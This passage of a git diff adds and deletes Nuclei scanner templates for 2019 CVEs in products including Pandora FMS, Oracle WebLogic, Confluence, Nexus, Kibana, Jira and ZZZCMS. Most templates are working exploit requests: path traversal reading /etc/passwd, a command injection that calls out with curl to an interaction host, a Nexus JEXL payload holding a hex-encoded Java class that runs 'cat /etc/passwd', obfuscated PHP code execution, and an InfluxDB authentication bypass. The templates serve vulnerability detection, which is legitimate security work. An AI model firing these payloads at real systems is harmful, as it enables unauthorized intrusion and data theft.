"{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml deleted file mode 100644 index e6ded4687b..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20224.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2019-20224 - -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - epss-score: 0.18764 - epss-percentile: 0.95774 - cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: artica - product: pandora_fms - tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica - -http: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - name: "http" - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 200 -# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-20354.yaml b/nuclei-templates/CVE-2019/cve-2019-20354.yaml deleted file mode 100644 index b02d059684..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20354.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-20354 - -info: - author: "pikpikcu" - name: "piSignage 2.6.4 Directory Traversal" - severity: High - - #Source:-https://github.com/colloqi/piSignage/issues/97 - -requests: - - raw: - - | - GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Content-Type: application/x-www-form-urlencoded - Content-Length: 277 - Connection: close - Referer: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/cve-2019-20933.yaml b/nuclei-templates/CVE-2019/cve-2019-20933.yaml deleted file mode 100644 index 8f2e603c54..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20933.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2019-20933 - -info: - name: InfluxDB <1.7.6 - Authentication Bypass - author: pussycat0x,c-sh0 - severity: critical - description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - impact: | - An attacker can bypass authentication and gain unauthorized access to the InfluxDB database. - remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. - reference: - - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933 - - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-20933 - cwe-id: CWE-287 - epss-score: 0.04913 - epss-percentile: 0.92609 - cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: influxdata - product: influxdb - shodan-query: InfluxDB - tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata - -http: - - method: GET - path: - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"results":' - - '"name":"databases"' - condition: and - - - type: status - status: - - 200 -# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-2588.yaml b/nuclei-templates/CVE-2019/cve-2019-2588.yaml deleted file mode 100644 index 92c2d58019..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-2588.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2019-2588 - -info: - name: Oracle Business Intelligence Path Traversal - author: madrobot - severity: medium - tags: cve,cve2019,oracle,lfi - reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - description: | - Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N - cvss-score: 4.90 - cve-id: CVE-2019-2588 - -requests: - - method: GET - path: - - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" - matchers-condition: and - matchers: - - type: word - words: - - 'for 16-bit app support' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-2616.yaml b/nuclei-templates/CVE-2019/cve-2019-2616.yaml new file mode 100644 index 0000000000..cc8c1eda41 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-2616.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-2616 + +info: + name: XXE in Oracle Business Intelligence and XML Publisher + author: pdteam + severity: high + description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 + - https://www.exploit-db.com/exploits/46729 + tags: cve,cve2019,oracle,xxe,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2616 + +requests: + - raw: + - | + POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Type: text/xml; charset=UTF-8 + + + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-2725.yaml b/nuclei-templates/CVE-2019/cve-2019-2725.yaml new file mode 100644 index 0000000000..7fbac5b4c5 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-2725.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-2725 + +info: + name: Oracle WebLogic Server - Unauthenticated RCE + author: dwisiswant0 + severity: critical + tags: cve,cve2019,oracle,weblogic,rce + description: | + Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: + - https://paper.seebug.org/910/ + - https://www.exploit-db.com/exploits/46780/ + - https://www.oracle.com/security-alerts/cpujan2020.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-2725 + cwe-id: CWE-74 + +requests: + - method: POST + path: + - "{{BaseURL}}/_async/AsyncResponseService" + headers: + Content-Type: application/soap; charset="utf-8" + body: >- + + + + + + matchers-condition: and + matchers: + - type: word + words: + - "soapenv:Envelope" + part: body + - type: word + words: + - "X-Powered-By: Servlet" + part: header + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-3396.yaml b/nuclei-templates/CVE-2019/cve-2019-3396.yaml deleted file mode 100644 index 9a4ba766ef..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3396.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-3396 -info: - author: harshbothra_ - name: Atlassian Confluence Path Traversal - severity: critical - description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. - reference: https://github.com/x-f1v3/CVE-2019-3396 - tags: cve,cve2019,atlassian,confluence,lfi,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-3396 - cwe-id: CWE-22 - -requests: - - raw: - - | - POST /rest/tinymce/1/macro/preview HTTP/1.1 - Host: {{Hostname}} - Referer: {{Hostname}} - - {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "contextConfigLocation" diff --git a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml b/nuclei-templates/CVE-2019/cve-2019-3401.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-3401.yaml rename to nuclei-templates/CVE-2019/cve-2019-3401.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3402.yaml b/nuclei-templates/CVE-2019/cve-2019-3402.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-3402.yaml rename to nuclei-templates/CVE-2019/cve-2019-3402.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3799.yaml b/nuclei-templates/CVE-2019/cve-2019-3799.yaml new file mode 100644 index 0000000000..f4c662a765 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-3799.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-3799 +info: + name: Spring-Cloud-Config-Server Directory Traversal + author: madrobot + severity: medium + description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://github.com/mpgn/CVE-2019-3799 + - https://pivotal.io/security/cve-2019-3799 + tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-3799 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-3912.yaml b/nuclei-templates/CVE-2019/cve-2019-3912.yaml deleted file mode 100644 index 6861b43f27..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3912.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-3912 - -info: - name: LabKey Server < 18.3.0 - Open redirect - author: 0x_Akoko - severity: medium - description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites. - reference: - - https://www.tenable.com/security/research/tra-2019-03 - - https://www.cvedetails.com/cve/CVE-2019-3912 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-3912 - cwe-id: CWE-601 - metadata: - shodan-query: "Server: Labkey" - tags: cve,cve2019,redirect,labkey - -requests: - - method: GET - path: - - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/cve-2019-7238.yaml b/nuclei-templates/CVE-2019/cve-2019-7238.yaml new file mode 100644 index 0000000000..e6d8c9427e --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7238.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-7275.yaml b/nuclei-templates/CVE-2019/cve-2019-7275.yaml deleted file mode 100644 index c50714bebc..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-7275.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2019-7275 - -info: - name: Open Redirect in Optergy Proton/Enterprise BMS - author: 0x_Akoko - severity: medium - reference: - - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html - - https://applied-risk.com/resources/ar-2019-008 - - https://cxsecurity.com/issue/WLB-2019110074 - tags: cve,cve2019,redirect - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-7275 - cwe-id: CWE-601 - description: "Optergy Proton/Enterprise devices allow Open Redirect." - -requests: - - method: GET - path: - - "{{BaseURL}}/updating.jsp?url=https://example.com/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2019/cve-2019-7609.yaml b/nuclei-templates/CVE-2019/cve-2019-7609.yaml new file mode 100644 index 0000000000..8621f4e5a1 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7609.yaml @@ -0,0 +1,41 @@ +id: CVE-2019-7609 + +info: + name: Kibana Timelion Arbitrary Code Execution + author: dwisiswant0 + severity: critical + description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + reference: + - https://github.com/mpgn/CVE-2019-7609 + - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 + tags: cve,cve2019,kibana,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7609 + cwe-id: CWE-94 + +requests: + - method: POST + path: + - "{{BaseURL}}/api/timelion/run" + headers: + Content-Type: "application/json; charset=utf-8" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + + matchers-condition: and + matchers: + - type: word + words: + - "seriesList" + part: body + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-8442.yaml b/nuclei-templates/CVE-2019/cve-2019-8442.yaml new file mode 100644 index 0000000000..6effba17ec --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8442.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-8442 +info: + name: JIRA Directory Traversal + author: Kishore Krishna (siLLyDaddy) + severity: high + description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. + reference: https://jira.atlassian.com/browse/JRASERVER-69241 + tags: cve,cve2019,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8442 + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'com.atlassian.jira' + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml new file mode 100644 index 0000000000..5ae0e70a6c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8449.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-8449 + +info: + name: JIRA Unauthenticated Sensitive Information Disclosure + author: harshbothra_ + severity: medium + description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + reference: + - https://www.doyler.net/security-not-included/more-jira-enumeration + - https://jira.atlassian.com/browse/JRASERVER-69796 + tags: cve,cve2019,atlassian,jira,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '{"users":{"users":' + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-8937.yaml b/nuclei-templates/CVE-2019/cve-2019-8937.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8937.yaml rename to nuclei-templates/CVE-2019/cve-2019-8937.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9041.yaml b/nuclei-templates/CVE-2019/cve-2019-9041.yaml new file mode 100644 index 0000000000..05c0ba21cc --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-9041.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-9041 + +info: + name: ZZZCMS 1.6.1 RCE + author: pikpikcu + severity: high + description: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring. + reference: + - http://www.iwantacve.cn/index.php/archives/118/ + - https://www.exploit-db.com/exploits/46454/ + tags: cve,cve2019,zzzcms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-9041 + cwe-id: CWE-917 + +requests: + - method: POST + path: + - "{{BaseURL}}/search/" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if} + + matchers-condition: and + matchers: + - type: word + words: + - "phpinfo" + - "PHP Version" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9082.yaml b/nuclei-templates/CVE-2019/cve-2019-9082.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-9082.yaml rename to nuclei-templates/CVE-2019/cve-2019-9082.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9915.yaml b/nuclei-templates/CVE-2019/cve-2019-9915.yaml new file mode 100644 index 0000000000..0cb1c360e3 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-9915.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-9915 + +info: + name: GetSimple CMS 3.3.13 - Open Redirect + author: 0x_Akoko + severity: medium + description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms + - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 + - 